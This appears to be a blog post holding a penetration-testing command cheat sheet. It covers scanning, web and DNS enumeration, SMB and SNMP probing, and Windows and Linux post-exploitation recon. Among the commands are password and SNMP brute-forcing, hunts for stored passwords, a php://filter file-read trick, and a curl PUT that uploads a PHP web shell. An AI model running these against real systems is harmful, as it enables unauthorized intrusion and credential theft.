== IP DISCOVERY ==
netdiscover -r 10.0.2.0/24
nmap -sP 10.195.0.0/16 // ping discovery scan
## NMAP Service and OS Detection
nmap -sT -A -sV --version-intensity 6 -p- 192.168.31.149
nmap -sTU -A 192.168.1.1 // Os and services for TCP and UDP
nmap -sV 192.168.1.1 // service detection
nmap -sV --version-intensity 5 192.168.1.1 // service detection agressive. 0 is less agressive
xprobe2 -v -p tcp:80:open IP
== PORT SCANNING ==
## nmap -sS is the default scanning mode // TCP SYN SCAN
nmap -iL list-of-ips.txt //scan the targets from the text file
nmap 192.168.1.1 /24 //scan a subnet
nmap -F 192.168.1.1 //scan most common 100 ports. Fast.
nmap -p 100-200 192.168.1.1 // scan a range of ports
nmap -p- 192.168.1.1 // scan all ports
nmap -Pn -F 192.168.1.1 //scan selected ports and ignore discovery
## Other NMAP parameters
-oN outputfile.txt // save as txt
--script=ssl-heartbleed // checks for heartbleed
== Unicorn scans == // port scanner
us -H -msf -Iv 192.168.56.101 -p 1-65535 ## TCP connect SYN scan
us -H -mU -Iv 192.168.56.101 -p 1-65535 ## UDP scan
## -H = resolve hostnames
## -m = scan mode (sf - tcp, U - udp)
## -Iv - verbose
## Locate NSE scripts
locate nse | grep script
== DOMAIN info: ==
whois domain.com
whois x.x.x.x
http://netcraft.com/ //domain and hosting information
https://archive.org/web/ //Wayback machine
== HTTP finderprinting ==
wget http://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip
cd httprint_301/linux/
./httprint -h http://IP -s signatures.txt
== WEB DIRECTORY ENUMERATION ==
## searches for known files, like robots.txt, .htaccess, .htpasswd, etc
nmap --script http-enum 192.168.10.55
## grab robots.txt and filter it
curl -s http://192.168.56.102/robots.txt | grep Disallow | sed 's/Disallow: //'
## check which page is accessible to us (200 OK)
for i in $(curl -s http://192.168.56.102/robots.txt | grep Disallow | sed 's/Disallow: //') ; \
do RESULT=$(curl -s -I http://192.168.56.102"$i" | grep "200 OK") ; echo -e "$i $RESULT\r" ; done
## brute force a directory with custom wordlists
nmap -p80 --script=http-brute --script-args 'http-brute.path=/printers/, userdb=/usr/share/wordlists/metasploit/http_default_users.txt, passdb=/usr/share/wordlists/rockyou.txt' 192.168.x.x
## HTTP brute force a protected directory. Auditing against http basic, digest and ntlm authentication.
## This script uses the unpwdb and brute libraries to perform password guessing
nmap -p80 --script http-brute --script-args http-brute.path=/printers/ 192.168.x.x
## Discovers hostnames that resolve to the target's IP address by querying the online database at www.bfk.de
nmap --script -http-enum --script-args http-enum.basepath='pub/' 192.168.x.x
## Files and folders in a web root directory.
## /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
dirb http://192.168.x.x
## WEB page headers
nmap --script=http-headers 192.168.1.0/24
## WEb page headers
root@kali:~# nc -nvv 192.168.31.149 80
(UNKNOWN) [192.168.31.149] 80 (http) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Tue, 06 Mar 2018 11:47:38 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Sun, 12 Nov 2017 16:12:12 GMT
ETag: "512-55dcb6aaa2f50"
## WEB page titles from a subnet of IPs
nmap --script http-title -sV -p 80 192.168.1.0/24
## Grab banners
root@kali:~# nc -n -vv 192.168.13.230 80
HEAD / HTTP/1.1 // or 1.0
HEAD ### <address>Apache/2.2.22 (Ubuntu) Server at xyz.com Port 80</address>
GET /index
## HTTP methods. Inspecting the response of the OPTIONS verb on the /test directory.
curl -v -X OPTIONS http://192.168.230.153/test/
#get page with different user agent
curl -H "User-Agent:Mozilla/4.0" http://192.168.31.146:8080/phptax/ | head -n2
# create a .php file in /test directory with curl.
curl -X PUT -d '<?php system($_GET["c"]);' http://192.168.56.103/test/1.php
#connect to a UDP port
nc -u localhost 161
== DNS enumeration ==
dnsrecon -r 192.168.13.200-192.168.13.254 -n 192.168.13.220 //reverse lookup. dns server is -n
dnsrecon -d acme.local -D /usr/share/golismero/wordlist/dns/dnsrecon.txt -t brt //bruteforce the acme.local domain for domains and subdomains
dnsrecon -a -d thinc.local -n 192.168.13.220 ## trying zone transfer. -n is the DNS server
nmap -sU -p 22 --script=*dns* 192.168.1.200
## find DNS (A) records by trying a list of common sub-domains from a wordlist.
nmap -p 80 --script dns-brute.nse domain.com
python dnscan.py -d domain.com -w ./subdomains-10000.txt
== SSH server info ==
nmap --script=ssh2-enum-algos,ssh-hostkey,sshv1.nse 192.168.13.234
== WINDOWS ==
# search for files
C:\> dir /s /b network-secret.txt
dir /q calc.exe //display ownership
dir /a:d calc.exe // /a is mandatory
d Directories
h Hidden files
s System files
# Find all listening ports and filer by string
netstat -aon | find /i "listening" | findstr 127.0.0.1
#find out the used open ports in Windows
netstat -an | find /i "Listening"
netstat -an | find /i "Established"
#enumerate Windows services
tasklist /svc
# Find all listening ports and show the process and PID too
protocol, PID, port, service name, service, state of the connection. Use "| findstr" to filter.
netstat -abno
# Queries the configuration information for a specified service.
C:\WINDOWS\system32>sc qc alg
sc qc alg
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: alg
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINDOWS\System32\alg.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Application Layer Gateway Service
DEPENDENCIES :
SERVICE_START_NAME : NT AUTHORITY\LocalService
----------
#list security policy
net accounts
#list users
net users
WMIC /NODE: "BOB" COMPUTERSYSTEM GET USERNAME ##needs admin
#Display the username/domain you are currently logged in with
C:\Users\Administrator> echo %USERDOMAIN%\%USERNAME%
testdomain\Administrator
#list privileges via cmd
cacls *
cacls "C:\Program Files" /T | findstr Users
cacls *.exe | findstr "IUSR_BOB:F" ## lists permissions of *.exe and searches for the user and his full permissions string "IUSR_BOB:F".
#search for passwords in the Windows Registry
reg query "HKLM\Software\Microsoft\WindowsNT\Currentversion\Winlogon"
reg query "HKLM\System\CurrentControlSet\Services\SNMP"
#Display the hosts file
type C:\Windows\system32\drivers\etc\hosts
type c:\Winnt\system32\drivers\etc\hosts //Windows 2000
#display ARP table
arp -a
#display routing table
routeprint
#find out if Windows is 32 or 64 bits from cmd
wmic os get osarchitecture
#find out Windows version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
#get general system info from cmd
systeminfo
#get username
echo %username%
#display existing users
net users
#show firewall state. From WinXP upwards
netsh firewall show state
#firewall config
netsh firewall show config
== LINUX ==
## Use LinuxEnum.sh script
./LinEnum.sh
# search for files
find / -name "network-secret.txt"
locate "network-secret.txt"
# Search for specific strings inside a file
strings ./*.txt | grep password
grep -l -i pass /var/log/*.log 2>/dev/null
find / -maxdepth 10 -name *.conf -type f | grep -Hn pass; 2>/dev/null // searches for the string 'password' and output the line number
find / -maxdepth 10 -name *etc* -type f | grep -Hn pass; 2>/dev/null //as above, but in *etc*
## ls commands
find / -perm -4000 -type f 2>/dev/null //Find SUID files
find / -uid 0 -perm -4000 -type f 2>/dev/null //Find SUID files owned by root
find / -perm -2000 -type f 2>/dev/null // Find files with GUID bit set
find / -perm -2 -type f 2>/dev/null //Find world-writable files
find / -perm -2 -type d 2>/dev/null //Find word-writable directories
find /home –name .rhosts -print 2>/dev/null //Find rhost config files
ls -ahlR /root/ //list files recursively
## Service information
ps aux | grep root // View services running as root
cat /etc/inetd.conf // List services managed by inetd
cat /etc/xinetd.conf // As above for xinetd
## Find out what Linux interpreter you are using
ps -p $$
## see $PATH in Linux
echo $PATH
## chanage $PATH. As in add something to the PATH
export PATH=/some/path1:/some/path2 //redefine $PATH bash variable
== WEB APPLICATION SCANNERS ==
## scan Joomla
joomscan -u http://192.168.230.150:8081
## scan Wordpress
wpscan domain.com
## enumerate Wordpress users
wpscan --url http://10.10.10.2 --enumerate u
## bruteforce Wordpress user's password
wpscan --url 10.10.10.2/secret --wordlist /usr/share/wordlists/dirb/big.txt --threads 2
## scan a web appliction with nikto
nikto -C all -h http://IP
## scan web apps
skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP
skipfish -o 202 http://192.168.1.202/wordpress ## Using the given directory for output (-o 202) , scan the web application URL
## (http://192.168.1.202/wordpress):
## LFI, RFI, RCE
uniscan -u http://192.168.44.134:10000/ -qweds
### Test for LFI
# Harvest links from a page (to test for LFI)
fimap -H -u "http://192.168.56.129" -d 3 -w /tmp/urllist
#test for LFI using harvested links
fimap -m -l /tmp/urllist
== SQL ==
sqlmap -u "http://192.168.56.129/?page=login" -a --level=5
hexorbase ##MySql, Oracle, PostgreSQL, SQLlite, MS-Sql browser
== SMB NETBIOS==
enum4linux target
nmap -v -p 139,445 -oG smb.txt 192.168.11.200-254
nbtscan -r 192.168.11.0/24
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
smbmap -u "" -p "" -d MYGROUP -H 10.11.1.22
## NetBIOS NullSession enumeration
## This feature exists to allow unauthenticated machines to obtain browse lists from other
## Microsoft servers. Enum4linux is a wrapper built on top of smbclient,rpcclient, net and nmblookup
./enum4linux -a 192.168.1.1
## NMAP SMB scripts
nmap --script smb-* --script-args=unsafe=1 192.168.10.55
## ls -lh /usr/share/nmap/scripts/smb*
smb-brute.nse
smb-enum-domains.nse
smb-enum-groups.nse
smb-enum-processes.nse
smb-enum-sessions.nse
smb-enum-shares.nse
smb-enum-users.nse
smb-flood.nse
smb-ls.nse
smb-mbenum.nse
smb-os-discovery.nse
smb-print-text.nse
smb-psexec.nse
smb-security-mode.nse
smb-server-stats.nse
smb-system-info.nse
smb-vuln-conficker.nse
smb-vuln-cve2009-3103.nse
smb-vuln-ms06-025.nse
smb-vuln-ms07-029.nse
smb-vuln-ms08-067.nse
smb-vuln-ms10-054.nse
smb-vuln-ms10-061.nse
smb-vuln-regsvc-dos.nse
smbv2-enabled.nse
#mount SMB (Netbios/Windows) shares in Linux
smbclient -L \\WIN7\ -I 192.168.13.218
smbclient -L \\WIN7\ADMIN$ -I 192.168.13.218
smbclient -L \\WIN7\C$ -I 192.168.13.218
smbclient -L \\WIN7\IPC$ -I 192.168.13.218
smbclient '\\192.168.13.236\some-share' -o user=root,pass=root,workgroup=BOB
#mount MSB shares in Windows (via cmd)
net use X: \\<server>\<sharename> /USER:<domain>\<username> <password> /PERSISTENT:YES
== SNMP ==
nmap -sU -p 161 --script=*snmp* 192.168.1.200
xprobe2 -v -p udp:161:open 192.168.1.200
msf > use auxiliary/scanner/snmp/snmp_login
msf > use auxiliary/scanner/snmp/snmp_enum
snmp-check 192.168.1.2 -c public
snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP
onesixtyone -c /usr/share/wordlists/dirb/small.txt 192.168.1.200 // find communities with bruteforce
for i in $(cat /usr/share/wordlists/metasploit/unix_users.txt);do snmpwalk -v 1 -c $i 192.168.1.200;done| grep -e "Timeout" // find communities with bruteforce
== PHP ==
## Read PHP source code with php://filter
http://192.168.56.129/?page=upload // original page
http://192.168.0.105/?page=php://filter/convert.base64-encode/resource=upload
curl http://192.168.0.105/?page=php://filter/convert.base64-encode/resource=upload
-- The result needs to be decoded from Base64
== STENOGRAPHICS / EXIF ==
exiftool somephoto.png
steghide extract -sf ./file.wav
steghide extract -sf ./image.jpg
steghide info ./image.jpg
# Connect to IMAP SSL
openssl s_client -connect 192.168.44.133:993 -crlf
# Decode Base64 Encoded Values
echo -n "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" | base64 --decode
# Decode Hexidecimal Encoded Values
echo -n "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874" | xxd -r -ps
# Remove words less than 8 characters (for WPA)
cat really_big_list.txt | sort -u | pw-inspector -m 8 -M 63 > wpa_wordlist.txt
#remove first 15 lines from a text file
sed -i 1,15d ./somefile.txt
#remove non numeric chaaracters from a file
tr -cd '0-9\012' < ./myfile.sorted > myfile.sorted2
#keep line/words with more than 32 characters/bits (for MD5 filtering)
awk 'length>=32' ./list.txt > ./list.sorted
# newline after each blank space
sed -i 's/ /\n/g' ./test
No comments:
Post a Comment